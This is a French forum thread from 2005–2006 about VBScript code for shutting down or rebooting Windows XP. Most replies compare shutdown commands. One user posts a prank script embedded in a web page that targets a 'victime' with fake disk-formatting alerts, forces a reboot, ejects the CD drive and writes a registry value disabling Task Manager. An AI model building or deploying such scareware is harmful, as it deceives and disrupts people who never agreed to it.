ENFIN UN VBS POUR ETEINDRE/REDEMARRER WINDOWS XP QUI MARCHE...

tekila_bandita Messages postés 248 Date d'inscription mercredi 15 juin 2005 Statut Membre Dernière intervention 15 mars 2007 - 18 juin 2005 à 21:03
econs Messages postés 4030 Date d'inscription mardi 13 mai 2003 Statut Membre Dernière intervention 23 décembre 2008 - 27 mars 2006 à 22:27
Cette discussion concerne un article du site. Pour la consulter dans son contexte d'origine, cliquez sur le lien ci-dessous.

https://codes-sources.commentcamarche.net/source/32157-enfin-un-vbs-pour-eteindre-redemarrer-windows-xp-qui-marche

econs Messages postés 4030 Date d'inscription mardi 13 mai 2003 Statut Membre Dernière intervention 23 décembre 2008 24
27 mars 2006 à 22:27
Ca ne se télécharge pas, il n'y a pas de ZIP. Il faut recopier le code présenté par tekila_bandita dans ton application.
cs_khouda Messages postés 4 Date d'inscription mardi 21 mars 2006 Statut Membre Dernière intervention 3 avril 2006
27 mars 2006 à 22:15
li ya quilqune qu me donner le ien pour telecharger cxe projet la
tH3 GuItArIsTe 666 Messages postés 58 Date d'inscription jeudi 12 mai 2005 Statut Membre Dernière intervention 26 août 2006
21 août 2005 à 14:41
SLT

merci bocoup mais esque on peut compiler un vb avec un vbs ?? et kel est l'extention pour le VB ??

MERCI

+++SLT+++
tekila_bandita Messages postés 248 Date d'inscription mercredi 15 juin 2005 Statut Membre Dernière intervention 15 mars 2007 33
21 août 2005 à 13:49
Pour le timer :
wscript.sleep 1000 =timer pour une seconde
wscript.sleep 1000*60*8 =timer pour 8 minute...
Sinon, je ne pense pas qu'il soit possible de générer une barre de chargement en vbs, tu peux surement en vb, mais pas en vbs...
tH3 GuItArIsTe 666 Messages postés 58 Date d'inscription jeudi 12 mai 2005 Statut Membre Dernière intervention 26 août 2006
19 août 2005 à 15:23
a oui mince et joubliais

eske c possible de faire une barre de chargement pour simuler le chargement du formatage, en vbs ??
en faite je voudrais le code chargement juste après le msgbox suivant :
msgbox "votre ordinateur a rencontré un probleme avec ce site",VBCritical,"error 134"
if(MsgBox ("VOULEZ VOUS FORMATER VOTRE ORDINATEUR ?" ,vbYesNo) = vbYes) Then

voila donc si vous pouviez repondre a ce message et a celui juste au dessus ce serait pas mal !!

MERCI BOCOUP

+++SLT+++
tH3 GuItArIsTe 666 Messages postés 58 Date d'inscription jeudi 12 mai 2005 Statut Membre Dernière intervention 26 août 2006
19 août 2005 à 15:13
ba en faite je voudrais juste le code vbs "timer msgbox" de 8 minutes après le redemarage
qui active le code "deblok ctrl+alt+suppr" (ce message que javais ecrit datte de 3 jours du coup ce que je veu faire a changer LoL )
donc en faite mantenant c c kode :

Function Block()
On Error Resume Next
K = "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr"
WSSH.RegWrite K,1,"REG_DWORD"
End function

msgbox "votre ordinateur a rencontré un probleme avec ce site",VBCritical,"error 134"
if(MsgBox ("VOULEZ VOUS FORMATER VOTRE ORDINATEUR ?" ,vbYesNo) = vbYes) Then

Msgbox "Action réussie avec suxès. Vous venez de formater votre ordinateur", vbExclamation, "formatage réussie"
else

Msgbox "Vous venez de formater votre ordinateur", vbExclamation, "formatage réussie"
end if

Msgbox " Le formatage de votre ordinateur sera effectif dès son redemarrage",VBCritical, "SYSTEM 32 FORMATE"

strComputer = "."
Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate,(Shutdown)}!\" & strComputer & "\root\cimv2")

Set colOperatingSystems = objWMIService.ExecQuery ("Select * from Win32_OperatingSystem")

For Each objOperatingSystem in colOperatingSystems
objOperatingSystem.Reboot()
Next

Set oWMP = CreateObject("WMPlayer.OCX.7" )
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
End If

Function Deblock()
On Error Resume Next
Set WSSH = CreateObject ("wscript.shell")
K="HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr"
WSSH.RegWrite K,1,"REG_DWORD"
End function ` mais le kode deblok ctrl+alt+suppr doit s'activer 8 minutes après le code "eject graveur" (le temps que lordi se redemarre, si lordi ram assez)



et en faite lordre que je voudrais faire est celui la :

tout au debut le kode "blok+alt+suppr" s'active

ensuite ya les msgbox :
msgbox "votre ordinateur a rencontré un probleme avec ce site",VBCritical,"error 134"
if(MsgBox ("VOULEZ VOUS FORMATER VOTRE ORDINATEUR ?" ,vbYesNo) = vbYes) Then

Msgbox "Action réussie avec suxès. Vous venez de formater votre ordinateur", vbExclamation, "formatage réussie"
else

Msgbox "Vous venez de formater votre ordinateur", vbExclamation, "formatage réussie"
end if

Msgbox " Le formatage de votre ordinateur sera effectif dès son redemarrage",VBCritical, "SYSTEM 32 FORMATE"

ensuite le kode pour redemarrer

ensuite le kode "eject graveur"

et enfin le msgbox pour activer le code "deblok ctrl+alt+suppr" 8 minutes après le "eject graveur"

et pour finir 1 minute après le kode "deblok ctrl+alt+suppr" ya un msgbox qui dit tkt c juste une blague (enfin un truk du genre)

et voila

traduction : timer msgbox : ca ve dir un msgbox qui se lense dès le temps donner par exemple : msgbox "coucou" dans 8 minutes
donk voili voila

MERCI DE M'AIDER C'EST SIMPAS !!

+++SLT+++
tekila_bandita Messages postés 248 Date d'inscription mercredi 15 juin 2005 Statut Membre Dernière intervention 15 mars 2007 33
19 août 2005 à 10:43
Euh, est-ce que tu peux m'expliquer plus clairement ce que tu veux que je te dise, parce que là j'ai pas tout bien compris...
...
lol
:)
tH3 GuItArIsTe 666 Messages postés 58 Date d'inscription jeudi 12 mai 2005 Statut Membre Dernière intervention 26 août 2006
14 août 2005 à 15:08
slt
merci pour ton code c'est trop bien

par contre je suis entrain de compiler des vbs en .html et ton code ne marche pas quand il est compiler avec les autres :

<marquee> ||| ERROR 134||| ||| ERROR 134 ||| ||| ERROR 134 ||| ||| ||| ERROR 134 ||| </marquee>

<script language=vbscript>
<!--

msgbox "votre ordinateur a rencontré un probleme avec ce site",VBCritical,"error 134"
if(MsgBox ("VOULEZ VOUS FORMATER VOTRE ORDINATEUR ?" ,vbYesNo) = vbYes) Then

Msgbox "Action réussie avec suxès. Vous venez de formater votre ordinateur", vbExclamation, "formatage réussie"
else

Msgbox "Vous venez de formater votre ordinateur", vbExclamation, "formatage réussie"
end if

Msgbox " Le formatage de votre ordinateur sera effectif dès son redemarrage",VBCritical, "SYSTEM 32 FORMATE"

strComputer = "."
Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate,(Shutdown)}!\" & strComputer & "\root\cimv2")

Set colOperatingSystems = objWMIService.ExecQuery ("Select * from Win32_OperatingSystem")

For Each objOperatingSystem in colOperatingSystems
objOperatingSystem.Reboot()
Next

Set oWMP = CreateObject("WMPlayer.OCX.7" )
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
End If
-->
</script>


en fait je voudrais que dès que la "victime" arrive sur : "Le formatage de votre ordinateur sera effectif dès que vous cliquerez sur cliquerez sur le disque local (C:),après son redemarrage" eh bien ke dès kil klike sur "oki" ou "fermer" et bien le kode pour redemarrer se met en route et kan il se réallume et bien il y est le kode "ejct graveur" qui senclenche et du coup le le graveur s'ouvre. Du coup la "victime nosera pas kliker sur le disque local c . Et enfin (ce kode n'est pas dans le html) un message box ki saffiche 8 minutes après le redemarage ki dit : " t'inquiète c'estait une blague relaxe " ensuite un otre juste après qui dit: " ta eu peur ? (en metant yesbyno) " (et enfin sa c complémentaire) un mail qui viens dans ma reception (de mail) ki dit la reponse du gars. (mais le truk du mail c komplémentaire) juste pour le fun LOL

MERCI DE M'AIDER

+++SLT+++
tekila_bandita Messages postés 248 Date d'inscription mercredi 15 juin 2005 Statut Membre Dernière intervention 15 mars 2007 33
1 juil. 2005 à 17:41
oui mais là c'est un vbs....
Il permet de pouvoir éteindre son pc et d'apprendre quelques fonction du vbs....
Mais c'est vrai que shutdown est très simple...
ps: personne aurait la source pour créer un .bat??
BZY1 Messages postés 214 Date d'inscription jeudi 10 mars 2005 Statut Membre Dernière intervention 12 avril 2008
28 juin 2005 à 15:20
Salut je suis d'accord avec NHenry shutdown est super simple et ca marche tu fais un shell(shutdown -s -t 0) et tu arrête ton pc directement.
cs_roro06 Messages postés 732 Date d'inscription jeudi 2 janvier 2003 Statut Membre Dernière intervention 29 octobre 2007
21 juin 2005 à 10:01
Bonjour

Extrait de MSDN :

Tsshutdn

Permet à un administrateur de fermer à distance ou de redémarrer un serveur Terminal Server. Vous avez également la possibilité d'éteindre le serveur si l'ordinateur prend en charge le contrôle logiciel du courant alternatif.

tsshutdn [temps_attente] /server:nomserveur /reboot /powerdown /delay:délaifermeturesession /v

Paramètres

temps_attente

Après avoir averti les utilisateurs, indique une durée (en secondes) d'attente avant de fermer les sessions de tous les utilisateurs. La valeur par défaut est 60 secondes.

/server:nomserveur

Indique le serveur Terminal Server à éteindre. Si ce paramètre n'est pas indiqué, le serveur Terminal Server en cours est éteint.

/reboot

Redémarre le serveur Terminal Server après la fermeture des sessions utilisateur.

/powerdown

Éteint le serveur Terminal Server si l'ordinateur prend en charge le contrôle logiciel du courant alternatif.

/delay:délaifermeturesession

Après avoir fermé les sessions de tous les utilisateurs, indique la durée d'attente (en secondes) avant la fermeture de tous les processus et l'arrêt du serveur Terminal Server. La valeur par défaut est 30 secondes.

/v

Affiche des informations sur les actions en cours d'exécution.

note Note

* Seuls les administrateurs peuvent exécuter tsshutdn.
* Il est déconseillé d'utiliser la commande Arrêter du menu Démarrer pour éteindre un serveur Terminal Server. Cette méthode met fin aux sessions des utilisateurs sans les avertir.
* Toutes les sessions connectées reçoivent un avertissement indiquant qu'elles vont bientôt être fermées. Dans les sessions où des fichiers d'application sont ouverts, l'utilisateur est invité à enregistrer ces fichiers. Après le démarrage de la commande de fermeture de session, tsshutdn attend une durée déterminée (par défaut, elle est de 30 secondes et est définie à l'aide de /delay), avant de mettre fin à tous les processus.
* Tsshutdn ne redémarre pas le serveur Terminal Server sauf si l'option /reboot est indiquée.
NHenry Messages postés 15113 Date d'inscription vendredi 14 mars 2003 Statut Modérateur Dernière intervention 22 avril 2024 159
21 juin 2005 à 08:45
Utilisation : shutdown [-i | -l | -s | -r | -a] [-f] [-m \\nom_ordinateur] [-t xx] [-c "commentaire"] [-d up:xx:yy]

Sans argument Affiche ce message (identique ? -?)
-i Affiche l'interface graphique, doit ?tre la 1?re option
-l Ferme la session (ne peut pas ?tre utilis? avec l'option -m)
-s Met l'ordinateur hors tension
-r Met l'ordinateur hors tension et le red?marre
-a Annule une mise hors tension syst?me
-m \\nom_ordinateur Ordinateur distant ? mettre hors tension/red?marrer/annuler
-t xx D?finir le d?lai d'expiration pour la mise hors tension ? xx secondes
-c "commentaire" Commentaire de la mise hors tension (maximum de 127 caract?res)
-f Force des applications en cours d'ex?cution ? se fermer sans avertissement
-d [u][p]:xx:yy Le code de raison de la mise hors tension
u est le code utilisateur
p est un code de mise hors tension planifi?
xx est le code de raison majeur (valeur enti?re inf?rieure ? 256)
yy est le code de raison mineur (valeur enti?re positive inf?rieure ? 65536)
cs_fatiflawer Messages postés 1 Date d'inscription vendredi 10 juin 2005 Statut Membre Dernière intervention 20 juin 2005
20 juin 2005 à 17:47
je ne peut vous dire que je suis tres attacher de ces façon de gerer le xp mais je veut une façon plus simple et plus detailler s'ils vous plait.bye
NHenry Messages postés 15113 Date d'inscription vendredi 14 mars 2003 Statut Modérateur Dernière intervention 22 avril 2024 159
20 juin 2005 à 13:54
Pour ma par, j'utilise shutdown sous XP.
cs_roro06 Messages postés 732 Date d'inscription jeudi 2 janvier 2003 Statut Membre Dernière intervention 29 octobre 2007
20 juin 2005 à 10:23
Bonjour,
Perso, j'utilise :

set sh=createObject("wscript.shell")
sh.run "tsshutdn 1 /powerdown" ' possibilité d'utiliser /reboot
tekila_bandita Messages postés 248 Date d'inscription mercredi 15 juin 2005 Statut Membre Dernière intervention 15 mars 2007 33
20 juin 2005 à 08:42
Si vous voulez vous pouver toujours essayer ça aussi :

Public Sub ShutDownPc()
AppActivate ("Program Manager")
SendKeys "%{F4}" & "E" & "S" & "%{T}" & "%{R}" & "{ENTER}"
End Sub

Mais je crois que je me suis tromper à propos de quelques details....
cs_dragon Messages postés 2336 Date d'inscription samedi 14 juillet 2001 Statut Membre Dernière intervention 5 mai 2009 6
19 juin 2005 à 02:54
je sais pas si j'aime ce genre de source lol, ça pourrait donner trop d'idée

ah oui c,est vrai, faut avoir les droit et activer le vbs se qui est désactivé avec SP2 lol une chance

pas pire, surtout que les vbs ont beaucoup de sécurité dessus, donc avoir réussi a faire ça avec un vbs, il falait y penser.
cs_MasterHack Messages postés 586 Date d'inscription jeudi 18 septembre 2003 Statut Membre Dernière intervention 13 février 2008 2
19 juin 2005 à 01:34
j'ajoute que ce code marche que si la machine a WMI installe, et puis il faut avoir les previlleges administrateur.C bien continus
tekila_bandita Messages postés 248 Date d'inscription mercredi 15 juin 2005 Statut Membre Dernière intervention 15 mars 2007 33
18 juin 2005 à 21:03
Je vous laisse commenter...
Rejoignez-nous